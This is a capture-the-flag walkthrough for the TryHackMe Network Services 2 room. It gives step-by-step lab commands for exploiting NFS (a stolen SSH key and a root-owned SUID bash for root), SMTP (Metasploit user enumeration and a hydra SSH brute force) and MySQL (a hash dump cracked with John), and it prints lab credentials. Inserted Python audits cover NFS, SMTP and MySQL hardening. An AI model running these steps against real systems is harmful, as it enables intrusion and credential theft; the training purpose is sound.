TryHackMe - Network Services 2 - Walkthrough
Introduction
Today we're going to be doing a walkthrough for the Network Services 2 room hosted at https://tryhackme.com/room/networkservices2 . For this walkthrough, we'll be using two virtual machines (VMs): a Kali Linux VM as our attacking machine, and the deployed vulnerable VMs as the victim machines.
Task 1 - Get Connected
Questions:
Ready? Let's get going!
No answer needed
Task 2 - Understanding NFS
Questions
What does NFS stand for?
Answer contained within Task description
What process allows an NFS client to interact with a remote directory as though it was a physical device?
Answer contained within Task description, but the answer includes the suffix "ing".
What does NFS use to represent files and directories on the server?
Answer contained within Task description
What protocol does NFS use to communicate between the server and client?
Answer contained within Task description
What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2
Answer contained within Task description
Can a Windows NFS server share files with a Linux client? (Y/N)
Answer contained within Task description
Can a Linux NFS server share files with a MacOS client? (Y/N)
Answer contained within Task description
What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.
Google search term = network file system version 2016
Task 3 - Enumerating NFS
Questions
Conduct a thorough port scan of your choosing, how many ports are open?
nmap -p- -T4 10.10.108.14
Which port contains the service we're looking to enumerate?
nmap -p- -T4 10.10.108.14 | grep -i nfs
Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?
showmount -e 10.10.108.14
Time to mount the share to our local machine!
First, use "mkdir /tmp/mount" to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.
Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share- what is the name of the folder inside?
sudo mkdir /tmp/mount
sudo mount -t nfs -o nolock 10.10.108.14:/home /tmp/mount/
ls /tmp/mount
Have a look inside this directory, look at the files. Looks like we're inside a user's home directory...
No answer needed
(unofficial)
cd /tmp/mount/cappucino
ls -la
Interesting! Let's do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?
ls -la /tmp/mount/cappucino
Which of these keys is most useful to us?
ls /tmp/mount/cappucino/.ssh
Copy this file to a different location your local machine, and change the permissions to "600" using "chmod 600 [file]".
Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.
Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)
cd /tmp
cp /tmp/mount/cappucino/.ssh/id_rsa /tmp/id_rsa
chmod 600 id_rsa
ssh -i id_rsa cappucino@10.10.108.14
yes
Task 4 - Exploiting NFS
Questions
First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user's home directory.
No answer needed
(unofficial)
exit
cd /tmp/mount/cappucino
Download the bash executable to your Downloads directory. Then use "cp ~/Downloads/bash ." to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using "sudo chown root bash"
No answer needed
(unofficial)
cd /home/kali/Downloads
wget https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash?raw=true
mv 'bash?raw=true' bash
sudo chown root bash
Now, we're going to add the SUID bit permission to the bash executable we just copied to the share using "sudo chmod +[permission] bash". What letter do we use to set the SUID bit set using chmod?
Answer contained within this webpage:
https://www.liquidweb.com/kb/how-do-i-set-up-setuid-setgid-and-sticky-bits-on-linux/
Let's do a sanity check, let's check the permissions of the "bash" executable using "ls -la bash". What does the permission set look like? Make sure that it ends with -sr-x.
cd /tmp/mount/cappucino
mv /home/kali/Downloads/bash bash
sudo chmod 2755 bash
sudo chmod u+s bash
ls -la bash
Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Let's run it with "./bash -p". The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.
ssh -i /tmp/id_rsa cappucino@10.10.108.14
./bash -p
Great! If all's gone well you should have a shell as root! What's the root flag?
cat /root/root.txt
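The chown root step above only survives on the server when the export turns off root squashing, and the root-owned SUID file it leaves in the exported home directory is what the final step executes. The following Python audit is added here and is not part of the room or this walkthrough: it parses a constructed /etc/exports, flags entries with no_root_squash, and walks a directory for SUID files owned by root, which is what an administrator would run on the NFS server to catch both conditions.

```python
import os
import re
import stat

# Constructed sample of an /etc/exports file (not taken from the room's target).
SAMPLE_EXPORTS = """\
# home directories exported to everyone, root kept as root on the server
/home        *(rw,sync,no_root_squash,no_subtree_check)
/srv/public  10.0.0.0/24(ro,sync,root_squash) 10.0.1.7(rw)
/srv/share   192.168.1.5(rw,sync)
"""

_CLIENT = re.compile(r"([^(]*)(?:\((.*)\))?")  # host(opt,opt) with host or options optional

def parse_exports(text):
    """Return a list of (path, client, options) for every client on every export line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            host, opts = _CLIENT.fullmatch(client).groups()
            entries.append((path, host or "*", [o for o in (opts or "").split(",") if o]))
    return entries

def exports_without_root_squash(text):
    """exportfs squashes root unless an entry says no_root_squash, so only the explicit opt-out is flagged."""
    return [(path, host) for path, host, opts in parse_exports(text) if "no_root_squash" in opts]

def suid_files(root, owner_uid=0):
    """Walk `root` and return regular files that carry the SUID bit and are owned by owner_uid."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)  # lstat: never follow symlinks inside user-writable trees
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == owner_uid:
                hits.append(full)
    return hits

if __name__ == "__main__":
    for path, host in exports_without_root_squash(SAMPLE_EXPORTS):
        print(f"no_root_squash: {path} exported to {host}")
        for hit in suid_files(path):  # an absent path simply yields no hits
            print(f"  SUID root file inside export: {hit}")
```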
Task 5 - Understanding SMTP
Questions
What does SMTP stand for?
Answer contained within Task description
What does SMTP handle the sending of?
Answer contained within Task description
What is the first step in the SMTP process?
Answer contained within Task description
What is the default SMTP port?
Google search term = SMTP port
Where does the SMTP server send the email if the recipient's server is not available?
Answer contained within Task description
On what server does the Email ultimately end up on?
Answer contained within Task description
Can a Linux machine run an SMTP server? (Y/N)
Answer contained within Task description
Can a Windows machine run an SMTP server? (Y/N)
Answer contained within Task description
Task 6 - Enumerating SMTP
Questions
First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?
nmap 10.10.92.221
Okay, now we know what port we should be targeting, let's start up Metasploit. What command do we use to do this?
Answer available at the following link:
https://www.offensive-security.com/metasploit-unleashed/msfconsole/
Let's search for the module "smtp_version", what's its full module name?
msfconsole
search smtp_version
Great, now- select the module and list the options. How do we do this?
Answer contained within Task description.
Have a look through the options, does everything seem correct? What is the option we need to set?
use auxiliary/scanner/smtp/smtp_version
options
Set that to the correct value for your target machine. Then run the exploit. What's the system mail name?
set rhosts 10.10.92.221
run
What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.
nmap -p25 -sV 10.10.92.221
Good! We've now got a good amount of information on the target system to move onto the next stage. Let's search for the module "smtp_enum", what's its full module name?
msfconsole
search smtp_enum
What option do we need to set to the wordlist's path?
use auxiliary/scanner/smtp/smtp_enum
options
Once we've set this option, what is the other essential parameter we need to set?
set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
options
Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!
No answer needed
Okay! Now that's finished, what username is returned?
set rhosts 10.10.92.221
run
Task 7 - Exploiting SMTP
Questions
What is the password of the user we found during our enumeration stage?
hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.92.221 ssh
Great! Now, let's SSH into the server as the user. What are the contents of smtp.txt?
ssh administrator@10.10.92.221
yes
password: password found from previous task
cat smtp.txt
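The smtp_enum module in Task 6 builds its username list by sending VRFY, EXPN and RCPT TO for each candidate and reading which replies differ. The following Python model is added here and is not part of the room: it shows a minimal server-side command handler in its leaky form beside the hardened form (VRFY answered with 252 for every name, EXPN refused) and a per-session probe counter an operator can use to spot a wordlist run on the RCPT TO path, which a server cannot simply close. The account list, alias list and session lines are constructed.

```python
# Constructed local accounts and alias list for the model; not the room's target.
LOCAL_USERS = {"administrator", "postmaster"}
ALIASES = {"admins": ["administrator"]}

def _parse(line):
    """Split an SMTP command into (VERB, probed local part); 'RCPT TO:<a@b>' yields ('RCPT', 'a')."""
    verb, _, arg = line.strip().partition(" ")
    verb, arg = verb.upper(), arg.strip()
    if verb == "RCPT" and arg[:3].upper() == "TO:":
        arg = arg[3:].strip()
    return verb, arg.strip("<>").split("@")[0].lower()

def handle_command(line, hardened=True):
    """Reply to one SMTP command.

    Leaky mode answers VRFY/EXPN truthfully, so a name list can be checked one reply at a
    time. Hardened mode returns the same VRFY reply for every name and refuses EXPN.
    RCPT TO must still reject unknown recipients in both modes (otherwise mail bounces),
    so the session counter below is the control for that path.
    """
    verb, name = _parse(line)
    if verb == "VRFY":
        if hardened:
            return "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery"
        return f"250 2.1.5 <{name}>" if name in LOCAL_USERS else f"550 5.1.1 <{name}>: user unknown"
    if verb == "EXPN":
        if hardened:
            return "502 5.5.1 EXPN not supported"
        return "250 " + ", ".join(ALIASES[name]) if name in ALIASES else f"550 5.1.1 <{name}>: list unknown"
    if verb == "RCPT":
        return "250 2.1.5 OK" if name in LOCAL_USERS else f"550 5.1.1 <{name}>: recipient unknown"
    return "250 OK"  # EHLO, MAIL FROM, DATA and QUIT are not modelled

def probe_count(session_lines):
    """Number of distinct names one session probed via VRFY, EXPN or RCPT TO."""
    return len({name for verb, name in map(_parse, session_lines) if verb in ("VRFY", "EXPN", "RCPT")})

def is_enumeration(session_lines, threshold=5):
    """A normal session probes one or a few recipients; a wordlist run probes dozens."""
    return probe_count(session_lines) >= threshold

# Constructed session resembling what a user-enumeration scanner sends.
SESSION = ["EHLO scanner", "VRFY root", "VRFY admin", "VRFY administrator",
           "VRFY guest", "VRFY test", "VRFY postmaster", "QUIT"]

if __name__ == "__main__":
    for mode in (False, True):
        print("hardened" if mode else "leaky", [handle_command(c, mode) for c in SESSION[1:4]])
    print("enumeration burst:", is_enumeration(SESSION), "distinct probes:", probe_count(SESSION))
```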
Task 8 - Understanding MySQL
Questions
What type of software is MySQL?
Answer contained within Task description
What language is MySQL based on?
Answer contained within Task description
What communication model does MySQL use?
Answer contained within Task description
What is a common application of MySQL?
Answer contained within Task description
What major social network uses MySQL as their back-end database? This will require further research.
Google search term = mysql social network
Task 9 - Enumerating MySQL
Questions
As always, let's start out with a port scan, so we know what port the service we're trying to attack is running on. What port is MySQL using?
nmap -T4 10.10.116.113
Good, now- we think we have a set of credentials. Let's double check that by manually connecting to the MySQL server. We can do this using the command "mysql -h [IP] -u [username] -p"
No answer needed
(unofficial)
mysql -h 10.10.116.113 -u root -p
password: password
Okay, we know that our login credentials work. Let's quit out of this session with "exit" and launch up Metasploit.
No answer needed
(unofficial)
exit
msfconsole
We're going to be using the "mysql_sql" module.
Search for, select and list the options it needs. What three options do we need to set? (in descending order).
search mysql_sql
use auxiliary/admin/mysql/mysql_sql
options
Run the exploit. By default it will test with the "select version()" command, what result does this give you?
set password password
set rhosts 10.10.116.113
set username root
run
Great! We know that our exploit is landing as planned. Let's try to gain some more ambitious information. Change the "sql" option to "show databases". How many databases are returned?
set sql "show databases"
run
Task 10 - Exploiting MySQL
Questions
First, let's search for and select the "mysql_schemadump" module. What's the module's full name?
search mysql_schemadump
Great! Now, you've done this a few times by now so I'll let you take it from here. Set the relevant options, run the exploit. What's the name of the last table that gets dumped?
use auxiliary/scanner/mysql/mysql_schemadump
set password password
set rhosts 10.10.116.113
set username root
run
Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better... search for and select the "mysql_hashdump" module. What's the module's full name?
search mysql_hashdump
Again, I'll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?
use auxiliary/scanner/mysql/mysql_hashdump
set password password
set rhosts 10.10.116.113
set username root
run
Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called "hash.txt".
What is the user/hash combination string?
echo "<username>:<passwordHash>" > hash.txt
Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found?
/usr/sbin/john hash.txt
Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?
What's the contents of MySQL.txt
ssh carl@10.10.147.114
yes
password: doggie
cat MySQL.txt
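The user:*HASH string that mysql_hashdump produces in Task 10 is the mysql_native_password format, an unsalted double SHA-1, which is why John gets through it quickly and why two accounts with the same password carry identical hashes. The following Python audit is added here and is not part of the room: it computes that format and reports what a DBA can act on straight from mysql.user without cracking anything, namely empty passwords, legacy pre-4.1 hashes, and the same password shared across accounts. The dump lines are constructed.

```python
import hashlib
from collections import defaultdict

def native_hash(password):
    """mysql_native_password: '*' + uppercase hex of SHA1(SHA1(password)); there is no salt."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

# Constructed hashdump-style lines (user:hash), not the room's output.
SAMPLE_DUMP = [
    "root:" + native_hash("password"),
    "backup:" + native_hash("password"),   # same password as root, so the same hash
    "carl:" + native_hash("Correct-Horse-7!"),
    "legacy:5d2e19393cc5ef67",            # 16-hex OLD_PASSWORD format from MySQL < 4.1
    "app:",                               # account with an empty password
]

def parse_dump(lines):
    """Split 'user:hash' lines into (user, hash) pairs, keeping entries whose hash is empty."""
    pairs = []
    for line in lines:
        user, sep, h = line.strip().partition(":")
        if sep:
            pairs.append((user, h.strip()))
    return pairs

def classify(h):
    """Name the hash format: native (41 chars starting with '*'), legacy (16 hex), or empty."""
    if not h:
        return "empty"
    if h.startswith("*") and len(h) == 41:
        return "native"
    if len(h) == 16 and all(c in "0123456789abcdefABCDEF" for c in h):
        return "legacy"
    return "other"

def audit(lines):
    """Return findings an administrator can act on without cracking a single hash."""
    findings, by_hash = [], defaultdict(list)
    for user, h in parse_dump(lines):
        kind = classify(h)
        if kind == "empty":
            findings.append(f"{user}: empty password")
        elif kind == "legacy":
            findings.append(f"{user}: pre-4.1 OLD_PASSWORD hash, upgrade the account")
        elif kind == "native":
            by_hash[h].append(user)  # unsalted, so equal hashes mean equal passwords
    for users in by_hash.values():
        if len(users) > 1:
            findings.append(f"shared password across accounts: {', '.join(users)}")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_DUMP)))
```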
Task 11 - Further Learning
Questions
Congratulations! You did it!
No answer needed
Finish